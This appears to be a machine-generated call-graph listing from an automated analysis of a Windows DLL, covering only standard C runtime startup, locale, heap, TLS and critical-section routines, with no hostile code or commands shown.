11097->11094 11099 6e813489 GetLastError 11098->11099 11100 6e8134ed 11098->11100 11099->11096 11100->11097 11101 6e8134ff FreeLibrary 11100->11101 11101->11097 11102->11096 11102->11100 11105 6e80e6ba 11103->11105 11106 6e80bee9 11103->11106 11105->11106 11107 6e810543 11105->11107 11106->10913 11108 6e811c30 __freea 14 API calls 11107->11108 11109 6e81055b 11108->11109 11109->11105 11111 6e81121e 11110->11111 11113 6e811230 ___scrt_uninitialize_crt 11110->11113 11112 6e81122c 11111->11112 11121 6e8140c8 11111->11121 11112->10953 11113->10953 11116 6e80e712 11115->11116 11117 6e80e708 11115->11117 11116->10951 11196 6e80eb81 11117->11196 11124 6e813f59 11121->11124 11127 6e813ead 11124->11127 11128 6e813eb9 ___scrt_is_nonwritable_in_current_image 11127->11128 11135 6e811b83 EnterCriticalSection 11128->11135 11130 6e813f2f 11144 6e813f4d 11130->11144 11132 6e813ec3 ___scrt_uninitialize_crt 11132->11130 11136 6e813e21 11132->11136 11135->11132 11137 6e813e2d ___scrt_is_nonwritable_in_current_image 11136->11137 11147 6e8141e5 EnterCriticalSection 11137->11147 11139 6e813e37 ___scrt_uninitialize_crt 11143 6e813e70 11139->11143 11148 6e814063 11139->11148 11161 6e813ea1 11143->11161 11195 6e811bcb LeaveCriticalSection 11144->11195 11146 6e813f3b 11146->11112 11147->11139 11149 6e814078 ___std_exception_copy 11148->11149 11150 6e81408a 11149->11150 11151 6e81407f 11149->11151 11164 6e813ffa 11150->11164 11152 6e813f59 ___scrt_uninitialize_crt 68 API calls 11151->11152 11154 6e814085 11152->11154 11188 6e8100d4 11154->11188 11159 6e8140ab 11177 6e815884 11159->11177 11194 6e8141f9 LeaveCriticalSection 11161->11194 11163 6e813e8f 11163->11132 11165 6e81403a 11164->11165 11166 6e814013 11164->11166 11165->11154 11170 6e8143fc 11165->11170 11166->11165 11167 6e8143fc ___scrt_uninitialize_crt 39 API calls 11166->11167 11168 6e81402f 11167->11168 11169 6e8160a3 ___scrt_uninitialize_crt 64 API calls 11168->11169 11169->11165 11171 6e814408 11170->11171 11172 6e81441d 11170->11172 11173 6e811d53 __dosmaperr 14 API calls 11171->11173 11172->11159 11174 6e81440d 11173->11174 11175 6e810398 ___std_exception_copy 39 API calls 11174->11175 11176 6e814418 11175->11176 11176->11159 11178 6e815895 11177->11178 11180 6e8158a2 11177->11180 11179 6e811d53 __dosmaperr 14 API calls 11178->11179 11187 6e81589a 11179->11187 11181 6e8158eb 11180->11181 11183 6e8158c9 11180->11183 11182 6e811d53 __dosmaperr 14 API calls 11181->11182 11184 6e8158f0 11182->11184 11186 6e8157e2 ___scrt_uninitialize_crt 43 API calls 11183->11186 11185 6e810398 ___std_exception_copy 39 API calls 11184->11185 11185->11187 11186->11187 11187->11154 11189 6e8100e0 11188->11189 11190 6e8100f7 11189->11190 11192 6e81017f ___std_exception_copy 39 API calls 11189->11192 11191 6e81010a 11190->11191 11193 6e81017f ___std_exception_copy 39 API calls 11190->11193 11191->11143 11192->11190 11193->11191 11194->11163 11195->11146 11197 6e80e70d 11196->11197 11198 6e80eb8b 11196->11198 11200 6e80ebd8 11197->11200 11204 6e80f11a 11198->11204 11201 6e80ec02 11200->11201 11202 6e80ebe3 11200->11202 11201->11116 11203 6e80ebed DeleteCriticalSection 11202->11203 11203->11201 11203->11203 11209 6e80eff4 11204->11209 11207 6e80f14c TlsFree 11208 6e80f140 11207->11208 11208->11197 11210 6e80f015 11209->11210 11211 6e80f011 11209->11211 11210->11211 11212 6e80f07d GetProcAddress 11210->11212 11214 6e80f06e 11210->11214 11216 6e80f094 LoadLibraryExW 11210->11216 11211->11207 11211->11208 11212->11211 11214->11212 11215 6e80f076 FreeLibrary 11214->11215 11215->11212 11217 6e80f0ab GetLastError 11216->11217 11218 6e80f0db 11216->11218 11217->11218 11219 6e80f0b6 ___vcrt_InitializeCriticalSectionEx 11217->11219 11218->11210 11219->11218 11220 6e80f0cc LoadLibraryExW 11219->11220 11220->11210 11226 6e811243 11221->11226 11224 6e80eb81 ___vcrt_uninitialize_ptd 6 API calls 11225 6e80bb65 11224->11225 11225->10903 11229 6e811a88 11226->11229 11230 6e811a92 11229->11230 11231 6e80c04d 11229->11231 11233 6e81362d 11230->11233 11231->11224 11234 6e81350a _unexpected 5 API calls 11233->11234 11235 6e813649 11234->11235 11236 6e813652 11235->11236 11237 6e813664 TlsFree 11235->11237 11236->11231 11238->10897 11623 6e810d3e 11638 6e812d8d 11623->11638 11628 6e810d66 11666 6e810d97 11628->11666 11629 6e810d5a 11630 6e811c30 __freea 14 API calls 11629->11630 11632 6e810d60 11630->11632 11634 6e811c30 __freea 14 API calls 11635 6e810d8a 11634->11635 11636 6e811c30 __freea 14 API calls 11635->11636 11637 6e810d90 11636->11637 11639 6e810d4f 11638->11639 11640 6e812d96 11638->11640 11644 6e8132e4 GetEnvironmentStringsW 11639->11644 11688 6e811872 11640->11688 11645 6e8132fc 11644->11645 11650 6e810d54 11644->11650 11646 6e813241 ___scrt_uninitialize_crt WideCharToMultiByte 11645->11646 11647 6e813319 11646->11647 11648 6e813323 FreeEnvironmentStringsW 11647->11648 11649 6e81332e 11647->11649 11648->11650 11651 6e811be2 15 API calls 11649->11651 11650->11628 11650->11629 11652 6e813335 11651->11652 11653 6e81333d 11652->11653 11654 6e81334e 11652->11654 11655 6e811c30 __freea 14 API calls 11653->11655 11656 6e813241 ___scrt_uninitialize_crt WideCharToMultiByte 11654->11656 11657 6e813342 FreeEnvironmentStringsW 11655->11657 11658 6e81335e 11656->11658 11659 6e81337f 11657->11659 11660 6e813365 11658->11660 11661 6e81336d 11658->11661 11659->11650 11662 6e811c30 __freea 14 API calls 11660->11662 11663 6e811c30 __freea 14 API calls 11661->11663 11664 6e81336b FreeEnvironmentStringsW 11662->11664 11663->11664 11664->11659 11667 6e810dac 11666->11667 11668 6e811d66 _unexpected 14 API calls 11667->11668 11669 6e810dd3 11668->11669 11670 6e810ddb 11669->11670 11681 6e810de5 11669->11681 11671 6e811c30 __freea 14 API calls 11670->11671 11672 6e810d6d 11671->11672 11672->11634 11673 6e810e42 11674 6e811c30 __freea 14 API calls 11673->11674 11674->11672 11675 6e811d66 _unexpected 14 API calls 11675->11681 11676 6e810e51 12111 6e810e79 11676->12111 11680 6e811c30 __freea 14 API calls 11683 6e810e5e 11680->11683 11681->11673 11681->11675 11681->11676 11682 6e810e6c 11681->11682 11684 6e811c30 __freea 14 API calls 11681->11684 12102 6e811291 11681->12102 11685 6e8103c5 ___std_exception_copy 11 API calls 11682->11685 11686 6e811c30 __freea 14 API calls 11683->11686 11684->11681 11687 6e810e78 11685->11687 11686->11672 11689 6e811883 11688->11689 11690 6e81187d 11688->11690 11692 6e8136ab _unexpected 6 API calls 11689->11692 11710 6e811889 11689->11710 11691 6e81366c _unexpected 6 API calls 11690->11691 11691->11689 11693 6e81189d 11692->11693 11696 6e811d66 _unexpected 14 API calls 11693->11696 11693->11710 11695 6e81188e 11713 6e812b98 11695->11713 11698 6e8118ad 11696->11698 11699 6e8118b5 11698->11699 11700 6e8118ca 11698->11700 11701 6e8136ab _unexpected 6 API calls 11699->11701 11702 6e8136ab _unexpected 6 API calls 11700->11702 11703 6e8118c1 11701->11703 11704 6e8118d6 11702->11704 11707 6e811c30 __freea 14 API calls 11703->11707 11705 6e8118e9 11704->11705 11706 6e8118da 11704->11706 11709 6e8115b9 _unexpected 14 API calls 11705->11709 11708 6e8136ab _unexpected 6 API calls 11706->11708 11707->11710 11708->11703 11711 6e8118f4 11709->11711 11710->11695 11736 6e8112eb 11710->11736 11712 6e811c30 __freea 14 API calls 11711->11712 11712->11695 11884 6e812ced 11713->11884 11718 6e812bdb 11718->11639 11721 6e812c02 11909 6e812de8 11721->11909 11722 6e812bf4 11723 6e811c30 __freea 14 API calls 11722->11723 11723->11718 11726 6e812c3a 11727 6e811d53 __dosmaperr 14 API calls 11726->11727 11729 6e812c3f 11727->11729 11728 6e812c81 11731 6e812cca 11728->11731 11920 6e812811 11728->11920 11732 6e811c30 __freea 14 API calls 11729->11732 11730 6e812c55 11730->11728 11733 6e811c30 __freea 14 API calls 11730->11733 11735 6e811c30 __freea 14 API calls 11731->11735 11732->11718 11733->11728 11735->11718 11747 6e813b88 11736->11747 11739 6e8112fb 11741 6e811305 IsProcessorFeaturePresent 11739->11741 11746 6e811324 11739->11746 11743 6e811311 11741->11743 11777 6e81019c 11743->11777 11783 6e810a15 11746->11783 11786 6e813ab6 11747->11786 11750 6e813bcd 11753 6e813bd9 ___scrt_is_nonwritable_in_current_image 11750->11753 11751 6e811908 __dosmaperr 14 API calls 11759 6e813c0a __InternalCxxFrameHandler 11751->11759 11752 6e813c29 11755 6e811d53 __dosmaperr 14 API calls 11752->11755 11753->11751 11753->11752 11754 6e813c3b __InternalCxxFrameHandler 11753->11754 11753->11759 11756 6e813c71 __InternalCxxFrameHandler 11754->11756 11800 6e811b83 EnterCriticalSection 11754->11800 11757 6e813c2e 11755->11757 11761 6e813dab 11756->11761 11762 6e813cae 11756->11762 11773 6e813cdc 11756->11773 11797 6e810398 11757->11797 11759->11752 11759->11754 11776 6e813c13 11759->11776 11765 6e813db6 11761->11765 11832 6e811bcb LeaveCriticalSection 11761->11832 11762->11773 11801 6e8117b7 GetLastError 11762->11801 11767 6e810a15 __InternalCxxFrameHandler 21 API calls 11765->11767 11769 6e813dbe 11767->11769 11770 6e8117b7 _unexpected 39 API calls 11774 6e813d31 11770->11774 11772 6e8117b7 _unexpected 39 API calls 11772->11773 11828 6e813d57 11773->11828 11775 6e8117b7 _unexpected 39 API calls 11774->11775 11774->11776 11775->11776 11776->11739 11778 6e8101b8 __InternalCxxFrameHandler std::bad_exception::bad_exception 11777->11778 11779 6e8101e4 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 11778->11779 11782 6e8102b5 __InternalCxxFrameHandler 11779->11782 11780 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11781 6e8102d3 11780->11781 11781->11746 11782->11780 11784 6e810852 __InternalCxxFrameHandler 21 API calls 11783->11784 11785 6e810a26 11784->11785 11787 6e813ac2 ___scrt_is_nonwritable_in_current_image 11786->11787 11792 6e811b83 EnterCriticalSection 11787->11792 11789 6e813ad0 11793 6e813b12 11789->11793 11792->11789 11796 6e811bcb LeaveCriticalSection 11793->11796 11795 6e8112f0 11795->11739 11795->11750 11796->11795 11833 6e8102e4 11797->11833 11800->11756 11802 6e8117cd 11801->11802 11806 6e8117d3 11801->11806 11804 6e81366c _unexpected 6 API calls 11802->11804 11803 6e8136ab _unexpected 6 API calls 11805 6e8117ef 11803->11805 11804->11806 11808 6e811d66 _unexpected 14 API calls 11805->11808 11825 6e8117d7 SetLastError 11805->11825 11806->11803 11806->11825 11809 6e811804 11808->11809 11812 6e81181d 11809->11812 11813 6e81180c 11809->11813 11810 6e811867 11810->11772 11811 6e81186c 11814 6e8112eb __FrameHandler3::FrameUnwindToState 37 API calls 11811->11814 11816 6e8136ab _unexpected 6 API calls 11812->11816 11815 6e8136ab _unexpected 6 API calls 11813->11815 11817 6e811871 11814->11817 11818 6e81181a 11815->11818 11819 6e811829 11816->11819 11823 6e811c30 __freea 14 API calls 11818->11823 11820 6e811844 11819->11820 11821 6e81182d 11819->11821 11824 6e8115b9 _unexpected 14 API calls 11820->11824 11822 6e8136ab _unexpected 6 API calls 11821->11822 11822->11818 11823->11825 11826 6e81184f 11824->11826 11825->11810 11825->11811 11827 6e811c30 __freea 14 API calls 11826->11827 11827->11825 11829 6e813d23 11828->11829 11830 6e813d5b 11828->11830 11829->11770 11829->11774 11829->11776 11883 6e811bcb LeaveCriticalSection 11830->11883 11832->11765 11834 6e8102f6 ___std_exception_copy 11833->11834 11839 6e81031b 11834->11839 11836 6e81030e 11837 6e8100d4 ___std_exception_copy 39 API calls 11836->11837 11838 6e810319 11837->11838 11838->11776 11840 6e810332 11839->11840 11841 6e81032b 11839->11841 11846 6e810340 11840->11846 11854 6e810110 11840->11854 11850 6e810139 GetLastError 11841->11850 11844 6e810367 11844->11846 11857 6e8103c5 IsProcessorFeaturePresent 11844->11857 11846->11836 11847 6e810397 11848 6e8102e4 ___std_exception_copy 39 API calls 11847->11848 11849 6e8103a4 11848->11849 11849->11836 11851 6e810152 11850->11851 11861 6e8119b9 11851->11861 11855 6e810134 11854->11855 11856 6e81011b GetLastError SetLastError 11854->11856 11855->11844 11856->11844 11858 6e8103d1 11857->11858 11859 6e81019c __InternalCxxFrameHandler 8 API calls 11858->11859 11860 6e8103e6 GetCurrentProcess TerminateProcess 11859->11860 11860->11847 11862 6e8119d2 11861->11862 11863 6e8119cc 11861->11863 11864 6e8136ab _unexpected 6 API calls 11862->11864 11882 6e81016a SetLastError 11862->11882 11865 6e81366c _unexpected 6 API calls 11863->11865 11866 6e8119ec 11864->11866 11865->11862 11867 6e811d66 _unexpected 14 API calls 11866->11867 11866->11882 11868 6e8119fc 11867->11868 11869 6e811a04 11868->11869 11870 6e811a19 11868->11870 11871 6e8136ab _unexpected 6 API calls 11869->11871 11872 6e8136ab _unexpected 6 API calls 11870->11872 11873 6e811a10 11871->11873 11874 6e811a25 11872->11874 11879 6e811c30 __freea 14 API calls 11873->11879 11875 6e811a29 11874->11875 11876 6e811a38 11874->11876 11877 6e8136ab _unexpected 6 API calls 11875->11877 11878 6e8115b9 _unexpected 14 API calls 11876->11878 11877->11873 11880 6e811a43 11878->11880 11879->11882 11881 6e811c30 __freea 14 API calls 11880->11881 11881->11882 11882->11840 11883->11829 11885 6e812cf9 ___scrt_is_nonwritable_in_current_image 11884->11885 11887 6e812d13 11885->11887 11928 6e811b83 EnterCriticalSection 11885->11928 11888 6e812bc2 11887->11888 11891 6e8112eb __FrameHandler3::FrameUnwindToState 39 API calls 11887->11891 11895 6e81291f 11888->11895 11889 6e812d4f 11929 6e812d6c 11889->11929 11892 6e812d8c 11891->11892 11893 6e812d23 11893->11889 11894 6e811c30 __freea 14 API calls 11893->11894 11894->11889 11933 6e812423 11895->11933 11898 6e812940 GetOEMCP 11900 6e812969 11898->11900 11899 6e812952 11899->11900 11901 6e812957 GetACP 11899->11901 11900->11718 11902 6e811be2 11900->11902 11901->11900 11903 6e811c20 11902->11903 11907 6e811bf0 _unexpected 11902->11907 11904 6e811d53 __dosmaperr 14 API calls 11903->11904 11906 6e811c1e 11904->11906 11905 6e811c0b HeapAlloc 11905->11906 11905->11907 11906->11721 11906->11722 11907->11903 11907->11905 11976 6e8104b5 11907->11976 11910 6e81291f 41 API calls 11909->11910 11911 6e812e08 11910->11911 11912 6e812f0d 11911->11912 11914 6e812e45 IsValidCodePage 11911->11914 11919 6e812e60 std::bad_exception::bad_exception 11911->11919 11913 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11912->11913 11915 6e812c2f 11913->11915 11914->11912 11916 6e812e57 11914->11916 11915->11726 11915->11730 11917 6e812e80 GetCPInfo 11916->11917 11916->11919 11917->11912 11917->11919 11990 6e8129f3 11919->11990 11921 6e81281d ___scrt_is_nonwritable_in_current_image 11920->11921 12076 6e811b83 EnterCriticalSection 11921->12076 11923 6e812827 12077 6e81285e 11923->12077 11928->11893 11932 6e811bcb LeaveCriticalSection 11929->11932 11931 6e812d73 11931->11887 11932->11931 11934 6e812441 11933->11934 11935 6e81243a 11933->11935 11934->11935 11936 6e8117b7 _unexpected 39 API calls 11934->11936 11935->11898 11935->11899 11937 6e812462 11936->11937 11941 6e81420d 11937->11941 11942 6e814220 11941->11942 11943 6e812478 11941->11943 11942->11943 11949 6e8146ec 11942->11949 11945 6e81426b 11943->11945 11946 6e814293 11945->11946 11947 6e81427e 11945->11947 11946->11935 11947->11946 11971 6e812dd5 11947->11971 11950 6e8146f8 ___scrt_is_nonwritable_in_current_image 11949->11950 11951 6e8117b7 _unexpected 39 API calls 11950->11951 11952 6e814701 11951->11952 11953 6e814747 11952->11953 11962 6e811b83 EnterCriticalSection 11952->11962 11953->11943 11955 6e81471f 11963 6e81476d 11955->11963 11960 6e8112eb __FrameHandler3::FrameUnwindToState 39 API calls 11961 6e81476c 11960->11961 11962->11955 11964 6e81477b _unexpected 11963->11964 11966 6e814730 11963->11966 11965 6e8144a0 _unexpected 14 API calls 11964->11965 11964->11966 11965->11966 11967 6e81474c 11966->11967 11970 6e811bcb LeaveCriticalSection 11967->11970 11969 6e814743 11969->11953 11969->11960 11970->11969 11972 6e8117b7 _unexpected 39 API calls 11971->11972 11973 6e812dda 11972->11973 11974 6e812ced ___scrt_uninitialize_crt 39 API calls 11973->11974 11975 6e812de5 11974->11975 11975->11946 11979 6e8104e1 11976->11979 11980 6e8104ed ___scrt_is_nonwritable_in_current_image 11979->11980 11985 6e811b83 EnterCriticalSection 11980->11985 11982 6e8104f8 __InternalCxxFrameHandler 11986 6e81052f 11982->11986 11985->11982 11989 6e811bcb LeaveCriticalSection 11986->11989 11988 6e8104c0 11988->11907 11989->11988 11991 6e812a1b GetCPInfo 11990->11991 12000 6e812ae4 11990->12000 11996 6e812a33 11991->11996 11991->12000 11993 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 11995 6e812b96 11993->11995 11995->11912 12001 6e814a2d 11996->12001 11999 6e8153e3 43 API calls 11999->12000 12000->11993 12002 6e812423 39 API calls 12001->12002 12003 6e814a4d 12002->12003 12021 6e813187 12003->12021 12005 6e814b09 12008 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12005->12008 12006 6e814b01 12024 6e814b2e 12006->12024 12007 6e814a7a 12007->12005 12007->12006 12010 6e811be2 15 API calls 12007->12010 12012 6e814a9f __alloca_probe_16 std::bad_exception::bad_exception 12007->12012 12011 6e812a9b 12008->12011 12010->12012 12016 6e8153e3 12011->12016 12012->12006 12013 6e813187 ___scrt_uninitialize_crt MultiByteToWideChar 12012->12013 12014 6e814ae8 12013->12014 12014->12006 12015 6e814aef GetStringTypeW 12014->12015 12015->12006 12017 6e812423 39 API calls 12016->12017 12018 6e8153f6 12017->12018 12030 6e8151f4 12018->12030 12028 6e8130ef 12021->12028 12025 6e814b3a 12024->12025 12026 6e814b4b 12024->12026 12025->12026 12027 6e811c30 __freea 14 API calls 12025->12027 12026->12005 12027->12026 12029 6e813100 MultiByteToWideChar 12028->12029 12029->12007 12031 6e81520f 12030->12031 12032 6e813187 ___scrt_uninitialize_crt MultiByteToWideChar 12031->12032 12036 6e815253 12032->12036 12033 6e8153ce 12034 6e80b8f0 __ehhandler$?_Init@?$_Mpunct@D@std@@IAEXABV_Locinfo@2@_N@Z 5 API calls 12033->12034 12035 6e812abc 12034->12035 12035->11999 12036->12033 12037 6e811be2 15 API calls 12036->12037 12039 6e815279 __alloca_probe_16 12036->12039 12050 6e815321 12036->12050 12037->12039 12038 6e814b2e __freea 14 API calls 12038->12033 12040 6e813187 ___scrt_uninitialize_crt MultiByteToWideChar 12039->12040 12039->12050 12041 6e8152c2 12040->12041 12041->12050 12058 6e813738 12041->12058 12044 6e815330 12046 6e8153b9 12044->12046 12047 6e811be2 15 API calls 12044->12047 12051 6e815342 __alloca_probe_16 12044->12051 12045 6e8152f8 12049 6e813738 6 API calls 12045->12049 12045->12050 12048 6e814b2e __freea 14 API calls 12046->12048 12047->12051 12048->12050 12049->12050 12050->12038 12051->12046 12052 6e813738 6 API calls 12051->12052 12053 6e815385 12052->12053 12053->12046 12064 6e813241 12053->12064 12055 6e81539f 12055->12046 12056 6e8153a8 12055->12056 12057 6e814b2e __freea 14 API calls 12056->12057 12057->12050 12067 6e81340b 12058->12067 12062 6e813789 LCMapStringW 12063 6e813749 12062->12063 12063->12044 12063->12045 12063->12050 12066 6e813254 ___scrt_uninitialize_crt 12064->12066 12065 6e813292 WideCharToMultiByte 12065->12055 12066->12065 12068 6e81350a _unexpected 5 API calls 12067->12068 12069 6e813421 12068->12069 12069->12063 12070 6e813795 12069->12070 12073 6e813425 12070->12073 12072 6e8137a0 12072->12062 12074 6e81350a _unexpected 5 API calls 12073->12074 12075 6e81343b 12074->12075 12075->12072 12076->11923 12087 6e812fed 12077->12087 12079 6e812880 12080 6e812fed 39 API calls 12079->12080 12081 6e81289f 12080->12081 12082 6e811c30 __freea 14 API calls 12081->12082 12083 6e812834 12081->12083 12082->12083 12084 6e812852 12083->12084 12101 6e811bcb LeaveCriticalSection 12084->12101 12086 6e812840 12086->11731 12088 6e812ffe 12087->12088 12096 6e812ffa __InternalCxxFrameHandler 12087->12096 12089 6e813005 12088->12089 12091 6e813018 std::bad_exception::bad_exception 12088->12091 12090 6e811d53 __dosmaperr 14 API calls 12089->12090 12092 6e81300a 12090->12092 12094 6e813046 12091->12094 12095 6e81304f 12091->12095 12091->12096 12093 6e810398 ___std_exception_copy 39 API calls 12092->12093 12093->12096 12097 6e811d53 __dosmaperr 14 API calls 12094->12097 12095->12096 12098 6e811d53 __dosmaperr 14 API calls 12095->12098 12096->12079 12099 6e81304b 12097->12099 12098->12099 12100 6e810398 ___std_exception_copy 39 API calls 12099->12100 12100->12096 12101->12086 12103 6e8112ad 12102->12103 12104 6e81129f 12102->12104 12105 6e811d53 __dosmaperr 14 API calls 12103->12105 12104->12103 12109 6e8112c5 12104->12109 12106 6e8112b5 12105->12106 12107 6e810398 ___std_exception_copy 39 API calls 12106->12107 12108 6e8112bf 12107->12108 12108->11681 12109->12108 12110 6e811d53 __dosmaperr 14 API calls 12109->12110 12110->12106 12112 6e810e57 12111->12112 12113 6e810e86 12111->12113 12112->11680 12114 6e810e9d 12113->12114 12115 6e811c30 __freea 14 API calls 12113->12115 12116 6e811c30 __freea 14 API calls 12114->12116 12115->12113 12116->12112 11239 6e80b964 11240 6e80b9a2 11239->11240 11241 6e80b96f 11239->11241 11242 6e80babe __DllMainCRTStartup@12 86 API calls 11240->11242 11243 6e80b994 11241->11243 11244 6e80b974 11241->11244 11250 6e80b97e 11242->11250 11251 6e80b9b7 11243->11251 11246 6e80b979 11244->11246 11247 6e80b98a 11244->11247 11246->11250 11265 6e80bfe2 11246->11265 11270 6e80bfc3 11247->11270 11252 6e80b9c3 ___scrt_is_nonwritable_in_current_image 11251->11252 11278 6e80c053 11252->11278 11254 6e80b9ca __DllMainCRTStartup@12 11255 6e80b9f1 11254->11255 11256 6e80bab6 11254->11256 11263 6e80ba2d ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 11254->11263 11289 6e80bfb5 11255->11289 11258 6e80c1f2 __DllMainCRTStartup@12 4 API calls 11256->11258 11259 6e80babd 11258->11259 11260 6e80ba00 __RTC_Initialize 11260->11263 11292 6e80bed3 InitializeSListHead 11260->11292 11262 6e80ba0e 11262->11263 11293 6e80bf8a 11262->11293 11263->11250 11354 6e81120b 11265->11354 11557 6e80e6ec 11270->11557 11273 6e80bfcc 11273->11250 11276 6e80bfdf 11276->11250 11277 6e80e6f7 21 API calls 11277->11273 11279 6e80c05c 11278->11279 11297 6e80c3b8 IsProcessorFeaturePresent 11279->11297 11283 6e80c071 11283->11254 11284 6e80c06d 11284->11283 11307 6e8111ee 11284->11307 11287 6e80c088 11287->11254 11288 6e80e6ff ___scrt_uninitialize_crt 7 API calls 11288->11283 11348 6e80c08c 11289->11348 11291 6e80bfbc 11291->11260 11292->11262 11294 6e80bf8f ___scrt_release_startup_lock 11293->11294 11295 6e80c3b8 IsProcessorFeaturePresent 11294->11295 11296 6e80bf98 11294->11296 11295->11296 11296->11263 11298 6e80c068 11297->11298 11299 6e80e6cd 11298->11299 11310 6e80eb9c 11299->11310 11302 6e80e6d6 11302->11284 11304 6e80e6de 11305 6e80e6e9 11304->11305 11306 6e80ebd8 ___vcrt_uninitialize_locks DeleteCriticalSection 11304->11306 11305->11284 11306->11302 11339 6e813a1d 11307->11339 11311 6e80eba5 11310->11311 11313 6e80ebce 11311->11313 11314 6e80e6d2 11311->11314 11324 6e80f1ce 11311->11324 11315 6e80ebd8 ___vcrt_uninitialize_locks DeleteCriticalSection 11313->11315 11314->11302 11316 6e80eb4e 11314->11316 11315->11314 11329 6e80f0df 11316->11329 11321 6e80eb7e 11321->11304 11322 6e80eb81 ___vcrt_uninitialize_ptd 6 API calls 11323 6e80eb63 11322->11323 11323->11304 11325 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11324->11325 11326 6e80f1e8 11325->11326 11327 6e80f206 InitializeCriticalSectionAndSpinCount 11326->11327 11328 6e80f1f1 11326->11328 11327->11328 11328->11311 11330 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11329->11330 11331 6e80f0f9 11330->11331 11332 6e80f112 TlsAlloc 11331->11332 11333 6e80eb58 11331->11333 11333->11323 11334 6e80f190 11333->11334 11335 6e80eff4 ___vcrt_InitializeCriticalSectionEx 5 API calls 11334->11335 11336 6e80f1aa 11335->11336 11337 6e80f1c5 TlsSetValue 11336->11337 11338 6e80eb71 11336->11338 11337->11338 11338->11321 11338->11322 11340 6e813a2d 11339->11340 11341 6e80c07a 11339->11341 11340->11341 11343 6e8138e1 11340->11343 11341->11287 11341->11288 11344 6e8138e8 11343->11344 11345 6e81392b GetStdHandle 11344->11345 11346 6e81398d 11344->11346 11347 6e81393e GetFileType 11344->11347 11345->11344 11346->11340 11347->11344 11349 6e80c098 11348->11349 11350 6e80c09c 11348->11350 11349->11291 11351 6e80c0a9 ___scrt_release_startup_lock 11350->11351 11352 6e80c1f2 __DllMainCRTStartup@12 4 API calls 11350->11352 11351->11291 11353 6e80c112 11352->11353 11360 6e81178b 11354->11360 11357 6e80e6f7 11540 6e80ea83 11357->11540 11361 6e811795 11360->11361 11364 6e80bfe7 11360->11364 11362 6e81366c _unexpected 6 API calls 11361->11362 11363 6e81179c 11362->11363 11363->11364 11365 6e8136ab _unexpected 6 API calls 11363->11365 11364->11357 11366 6e8117af 11365->11366 11368 6e811652 11366->11368 11369 6e81165d 11368->11369 11370 6e81166d 11368->11370 11374 6e811673 11369->11374 11370->11364 11373 6e811c30 __freea 14 API calls 11373->11370 11375 6e81168e 11374->11375 11376 6e811688 11374->11376 11378 6e811c30 __freea 14 API calls 11375->11378 11377 6e811c30 __freea 14 API calls 11376->11377 11377->11375 11379 6e81169a 11378->11379 11380 6e811c30 __freea 14 API calls 11379->11380 11381 6e8116a5 11380->11381 11382 6e811c30 __freea 14 API calls 11381->11382 11383 6e8116b0 11382->11383 11384 6e811c30 __freea 14 API calls 11383->11384 11385 6e8116bb 11384->11385 11386 6e811c30 __freea 14 API calls 11385->11386 11387 6e8116c6 11386->11387 11388 6e811c30 __freea 14 API calls 11387->11388 11389 6e8116d1 11388->11389 11390 6e811c30 __freea 14 API calls 11389->11390 11391 6e8116dc 11390->11391 11392 6e811c30 __freea 14 API calls 11391->11392 11393 6e8116e7 11392->11393 11394 6e811c30 __freea 14 API calls 11393->11394 11395 6e8116f5 11394->11395 11400 6e81149f 11395->11400 11401 6e8114ab ___scrt_is_nonwritable_in_current_image 11400->11401 11416 6e811b83 EnterCriticalSection 11401->11416 11403 6e8114df 11417 6e8114fe 11403->11417 11405 6e8114b5 11405->11403 11407 6e811c30 __freea 14 API calls 11405->11407 11407->11403 11408 6e81150a 11409 6e811516 ___scrt_is_nonwritable_in_current_image 11408->11409 11421 6e811b83 EnterCriticalSection 11409->11421 11411 6e811520 11422 6e811740 11411->11422 11413 6e811533 11426 6e811553 11413->11426 11416->11405 11420 6e811bcb LeaveCriticalSection 11417->11420 11419 6e8114ec 11419->11408 11420->11419 11421->11411 11423 6e81174f _unexpected 11422->11423 11425 6e811776 _unexpected 11422->11425 11423->11425 11429 6e8144a0 11423->11429 11425->11413 11539 6e811bcb LeaveCriticalSection 11426->11539 11428 6e811541 11428->11373 11430 6e814520 11429->11430 11434 6e8144b6 11429->11434 11431 6e81456e 11430->11431 11433 6e811c30 __freea 14 API calls 11430->11433 11497 6e814611 11431->11497 11435 6e814542 11433->11435 11434->11430 11436 6e8144e9 11434->11436 11441 6e811c30 __freea 14 API calls 11434->11441 11437 6e811c30 __freea 14 API calls 11435->11437 11438 6e81450b 11436->11438 11445 6e811c30 __freea 14 API calls 11436->11445 11439 6e814555 11437->11439 11440 6e811c30 __freea 14 API calls 11438->11440 11444 6e811c30 __freea 14 API calls 11439->11444 11446 6e814515 11440->11446 11443 6e8144de 11441->11443 11442 6e81457c 11447 6e8145dc 11442->11447 11456 6e811c30 14 API calls __freea 11442->11456 11457 6e8147bd 11443->11457 11449 6e814563 11444->11449 11450 6e814500 11445->11450 11451 6e811c30 __freea 14 API calls 11446->11451 11452 6e811c30 __freea 14 API calls 11447->11452 11454 6e811c30 __freea 14 API calls 11449->11454 11485 6e8148bb 11450->11485 11451->11430 11453 6e8145e2 11452->11453 11453->11425 11454->11431 11456->11442 11458 6e8147ce 11457->11458 11484 6e8148b7 11457->11484 11460 6e8147df 11458->11460 11461 6e811c30 __freea 14 API calls 11458->11461 11459 6e8147f1 11463 6e814803 11459->11463 11464 6e811c30 __freea 14 API calls 11459->11464 11460->11459 11462 6e811c30 __freea 14 API calls 11460->11462 11461->11460 11462->11459 11465 6e814815 11463->11465 11466 6e811c30 __freea 14 API calls 11463->11466 11464->11463 11467 6e814827 11465->11467 11469 6e811c30 __freea 14 API calls 11465->11469 11466->11465 11468 6e814839 11467->11468 11470 6e811c30 __freea 14 API calls 11467->11470 11471 6e81484b 11468->11471 11472 6e811c30 __freea 14 API calls 11468->11472 11469->11467 11470->11468 11473 6e81485d 11471->11473 11474 6e811c30 __freea 14 API calls 11471->11474 11472->11471 11475 6e81486f 11473->11475 11477 